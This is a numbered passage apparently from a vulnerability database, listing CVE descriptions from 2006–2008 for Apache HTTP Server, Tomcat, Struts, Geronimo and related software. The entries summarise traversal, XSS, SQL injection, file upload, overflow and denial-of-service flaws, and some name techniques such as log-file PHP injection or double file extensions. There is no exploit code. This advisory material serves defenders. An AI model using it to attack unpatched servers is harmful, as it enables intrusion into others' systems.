12683| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
12684| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
12685| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
12686| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
12687| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
12688| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
12689| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
12690| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
12691| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
12692| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
12693| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
12694| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
12695| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
12696| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
12697| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
12698| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
12699| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
12700| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
12701| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
12702| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
12703| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
12704| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
12705| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
12706| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
12707| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
12708| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
12709| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
12710| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
12711| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
12712| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12713| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
12714| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
12715| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
12716| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
12717| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
12718| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
12719| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
12720| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
12721| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
12722| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
12723| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
12724| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
12725| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
12726| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12727| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
12728| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
12729| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
12730| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
12731| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
12732| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
12733| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
12734| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
12735| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
12736| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
12737| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
12738| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
12739| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
12740| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
12741| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
12742| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
12743| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
12744| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
12745| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
12746| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
12747| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
12748| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
12749| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
12750| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
12751| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
12752| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
12753| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
12754| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
12755| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
12756| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
12757| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
12758| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
12759| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12760| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
12761| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
12762| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
12763| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
12764| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
12765| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
12766| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
12767| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
12768| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
12769| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
12770| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
12771| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
12772| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
12773| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12774| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
12775| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
12776| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
12777| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
12778| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
12779| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
12780| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
12781| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
12782| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
12783| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
12784| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
12785| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
12786| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
12787| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
12788| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
12789| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
12790| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12791| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
12792| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
12793| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
